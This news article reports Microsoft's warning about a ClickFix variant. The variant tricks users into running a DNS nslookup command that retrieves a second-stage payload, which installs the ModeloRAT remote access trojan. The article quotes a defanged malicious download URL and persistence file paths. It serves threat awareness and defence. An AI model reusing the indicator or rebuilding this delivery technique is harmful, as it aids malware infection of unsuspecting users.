Microsoft alerts on DNS-based ClickFix variant delivering malware via nslookup

Microsoft warns of a new ClickFix variant that tricks users into running DNS commands to fetch malware via nslookup.

Microsoft has revealed a new ClickFix variant that deceives users into running a malicious nslookup command through the Windows Run dialog to retrieve a second-stage payload via DNS. ClickFix typically uses fake CAPTCHA or error messages to trick victims into infecting their own systems, helping attackers evade security defenses. The technique has evolved into multiple variants over the past two years.

“Microsoft Defender researchers observed attackers using yet another evasion approach to the ClickFix technique: Asking targets to run a command that executes a custom DNS lookup and parses the `Name:` response to receive the next-stage payload for execution.” Microsoft wrote on X.

Microsoft Defender researchers observed attackers using yet another evasion approach to the ClickFix technique: Asking targets to run a command that executes a custom DNS lookup and parses the `Name:` response to receive the next-stage payload for execution. pic.twitter.com/NFbv1DJsXn

— Microsoft Threat Intelligence (@MsftSecIntel) February 13, 2026

In the latest ClickFix variant, attackers use cmd.exe to perform a DNS lookup against a hard-coded external server. The Name: response is extracted and executed as the second-stage payload. This DNS-based approach lets attackers signal and deliver payloads via their own infrastructure, reducing reliance on web requests and helping the malicious activity blend into normal network traffic.

In the latest DNS-based staging using ClickFix, the initial command runs through cmd.exe and performs a DNS lookup against a hard-coded external DNS server, rather than the system’s default resolver. The output is filtered to extract the `Name:` DNS response, which is executed as… pic.twitter.com/QXf06cWOCx

— Microsoft Threat Intelligence (@MsftSecIntel) February 13, 2026

Microsoft warns that this new ClickFix variant uses DNS as a “lightweight staging or signaling channel,” allowing attackers to reach their own infrastructure and add a validation step before running the second-stage payload. This method reduces reliance on web requests and helps hide malicious activity in normal network traffic. The payload downloads a ZIP from an external server, extracts a Python script to conduct reconnaissance, and drops a VBScript that launches ModeloRAT, a Python-based RAT.

Attackers achieve persistence by creating a Windows shortcut in the Startup folder, ensuring the malware runs at every system startup.

“Upon execution of the second-stage payload provided by the DNS response, the attack proceeds through an attack chain leading to downloading hxxp://azwsappdev[.]com/wdhmgpmihudkueq[.]zip and extracting a portable Python bundle and malicious python code, then running a malicious Python script for host/domain reconnaissance, performing a series of discovery commands, before dropping the final payload `%APPDATA%\WPy64-31401\python\script.vbs` and `%STARTUP%/MonitoringService.lnk`pointing to the VBScript for persistence. This final payload is a remote access trojan and called ModeloRAT.” conlcudes the report.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, ClickFix)